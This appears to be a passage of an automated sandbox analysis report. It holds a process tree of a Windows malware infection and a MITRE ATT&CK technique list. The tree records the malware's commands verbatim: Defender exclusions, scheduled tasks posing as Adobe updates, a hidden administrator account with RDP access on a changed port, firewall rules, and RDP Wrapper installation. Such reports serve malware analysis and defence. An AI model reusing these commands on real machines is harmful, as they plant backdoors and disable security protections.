    - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com f
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:5104
      - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        6⤵
        Executes dropped EXE
        Drops Chrome extension
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3876
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
      4⤵
      System Location Discovery: System Language Discovery
      PID:4996
  - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com
      Inebriato.exe.com R
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4624
    - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com R
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3572
      - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2500
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"""
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3640
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"""
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2412
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:668
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe""
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3544
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\eonCI\1136.vbs" "C:\Users\Admin\AppData\Roaming\eonCI\937.vbs
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4312
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\eonCI\1136.vbs" "C:\Users\Admin\AppData\Roaming\eonCI\937.vbs
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2384
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\eonCI\89.vbs" ayYmDfWpfJ RwJwUdaSmz "C:\Users\Admin\AppData\Roaming\eonCI\539.vbs" "C:\Users\Admin\AppData\Roaming\eonCI\azfyXaQu.bat" "C:\Users\Admin\AppData\Roaming\eonCI\EYb.dll"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2148
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\eonCI\89.vbs" ayYmDfWpfJ RwJwUdaSmz "C:\Users\Admin\AppData\Roaming\eonCI\539.vbs" "C:\Users\Admin\AppData\Roaming\eonCI\azfyXaQu.bat" "C:\Users\Admin\AppData\Roaming\eonCI\EYb.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2472
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\eonCI\EYb.dll" /tn "Adobe Acrobat Update Task56"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1420
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\eonCI\EYb.dll" /tn "Adobe Acrobat Update Task56"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3880
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\eonCI\338.vbs" "C:\Users\Admin\AppData\Roaming\eonCI\937.vbs" "C:\Users\Admin\AppData\Roaming\eonCI\EYb.dll"
        7⤵
        
        PID:3572
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\eonCI\338.vbs" "C:\Users\Admin\AppData\Roaming\eonCI\937.vbs" "C:\Users\Admin\AppData\Roaming\eonCI\EYb.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1664
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\eonCI\EYb.dll" /tn "Adobe Flash Player PPAPI Notifier64"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2004
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\eonCI\EYb.dll" /tn "Adobe Flash Player PPAPI Notifier64"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1744
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\eonCI\JpsbhAoeBw.bat ayYmDfWpfJ RwJwUdaSmz"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3156
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2792
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-544" get name /value
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3844
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2360
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-555" get name /value
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1516
        
        C:\Windows\SysWOW64\net.exe
        
        net user ayYmDfWpfJ RwJwUdaSmz /add
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3640
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user ayYmDfWpfJ RwJwUdaSmz /add
        9⤵
        
        PID:3148
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup Administrators ayYmDfWpfJ /add
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2920
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators ayYmDfWpfJ /add
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3340
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" ayYmDfWpfJ /add
        8⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:3384
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" ayYmDfWpfJ /add
        9⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:5056
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4004
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        9⤵
        
        PID:644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ayYmDfWpfJ /t REG_DWORD /d "00000000" /f
        8⤵
        Hide Artifacts: Hidden Users
        System Location Discovery: System Language Discovery
        
        PID:1452
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
        8⤵
        
        PID:1000
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
        8⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4156
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2504
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4056
        
        C:\Windows\SysWOW64\timeout.exe
        
        Timeout /t 15
        8⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2700
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\rdpwrap.bat"
        7⤵
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:3192
        
        C:\Windows\SysWOW64\fsutil.exe
        
        fsutil dirty query C:
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3136
        
        C:\Windows\SysWOW64\sc.exe
        
        sc queryex "TermService"
        8⤵
        Launches sc.exe
        
        PID:220
        
        C:\Windows\SysWOW64\find.exe
        
        find "STATE"
        8⤵
        
        PID:1172
        
        C:\Windows\SysWOW64\find.exe
        
        find /v "RUNNING"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1664
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4220
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:3732
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4624
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2508
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        
        PID:1540
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c query session rdp-tcp
        8⤵
        
        PID:1936
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        
        PID:4608
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:856
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:2448
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2504
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:452
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1800
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3180
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        8⤵
        
        PID:4016
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        9⤵
        
        PID:1908
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4864
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.19041.1202" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3972
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1532
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4724
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        9⤵
        Blocklisted process makes network request
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:904
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c findstr /n "^" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:632
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /n "^" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        9⤵
        
        PID:2684
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3320
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3076
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1668
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4416
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\eonCI\182.vbs" "C:\Users\Admin\AppData\Roaming\eonCI\730.vbs" "VlZaR2JsQlhSalZYVnpGRldteGtkMXByYjIxVmEwcGFXbFF4VTJRd2NETldWMUpvVlRJeE5rcHJTbGRhTTBaTlYxYzBPV1Y2ClNYbFJlbGsxVWxSa1JFeFZUVFZTYW1OMENrNUVVWGRQVXpGQ1RtdFJNVXhWVFhsUlZFNUZVV3RWZWxKVVdUSlJiakE5" "C:\Users\Admin\AppData\Roaming\eonCI\EYb.dll"
        7⤵
        
        PID:3324
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\eonCI\182.vbs" "C:\Users\Admin\AppData\Roaming\eonCI\730.vbs" "VlZaR2JsQlhSalZYVnpGRldteGtkMXByYjIxVmEwcGFXbFF4VTJRd2NETldWMUpvVlRJeE5rcHJTbGRhTTBaTlYxYzBPV1Y2ClNYbFJlbGsxVWxSa1JFeFZUVFZTYW1OMENrNUVVWGRQVXpGQ1RtdFJNVXhWVFhsUlZFNUZVV3RWZWxKVVdUSlJiakE5" "C:\Users\Admin\AppData\Roaming\eonCI\EYb.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2700
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\eonCI\EYb.dll" /tn "Adobe Acrobat Update Task94"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:616
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\eonCI\EYb.dll" /tn "Adobe Acrobat Update Task94"
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:524
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 30
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1624

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:2864

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:2528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1232

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\eonCI\730.vbs" VlZaR2JsQlhSalZYVnpGRldteGtkMXByYjIxVmEwcGFXbFF4VTJRd2NETldWMUpvVlRJeE5rcHJTbGRhTTBaTlYxYzBPV1Y2ClNYbFJlbGsxVWxSa1JFeFZUVFZTYW1OMENrNUVVWGRQVXpGQ1RtdFJNVXhWVFhsUlZFNUZVV3RWZWxKVVdUSlJiakE5
1⤵
- Blocklisted process makes network request
PID:3572

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\eonCI\539.vbs" ayYmDfWpfJ RwJwUdaSmz "C:\Users\Admin\AppData\Roaming\eonCI\azfyXaQu.bat"
1⤵
- Checks computer location settings
PID:1744
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\eonCI\azfyXaQu.bat
  2⤵
  - Drops file in System32 directory
  PID:4892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
    3⤵
    PID:4432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic group where sid="S-1-5-32-544" get name /value
      4⤵
      PID:2864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
    3⤵
    PID:2736
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic group where sid="S-1-5-32-555" get name /value
      4⤵
      PID:2136
- - C:\Windows\system32\net.exe
    net user ayYmDfWpfJ RwJwUdaSmz /add
    3⤵
    PID:5108
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user ayYmDfWpfJ RwJwUdaSmz /add
      4⤵
      PID:1000
- - C:\Windows\system32\net.exe
    net localgroup Administrators ayYmDfWpfJ /add
    3⤵
    PID:3680
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators ayYmDfWpfJ /add
      4⤵
      PID:2052
- - C:\Windows\system32\net.exe
    net localgroup Remote Desktop Users ayYmDfWpfJ /add
    3⤵
    PID:1700
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Remote Desktop Users ayYmDfWpfJ /add
      4⤵
      PID:4144
- - C:\Windows\system32\net.exe
    net accounts /maxpwage:unlimited
    3⤵
    PID:2440
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 accounts /maxpwage:unlimited
      4⤵
      PID:4440
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ayYmDfWpfJ /t REG_DWORD /d "00000000" /f
    3⤵
    - Hide Artifacts: Hidden Users
    PID:4988
- - C:\Windows\system32\reg.exe
    reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
    3⤵
    PID:2892
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:64
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4856
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4768
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3612
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3440
- - C:\Windows\system32\timeout.exe
    Timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:1464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Password Policy Discovery

T1201

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

Remote System Discovery

T1018

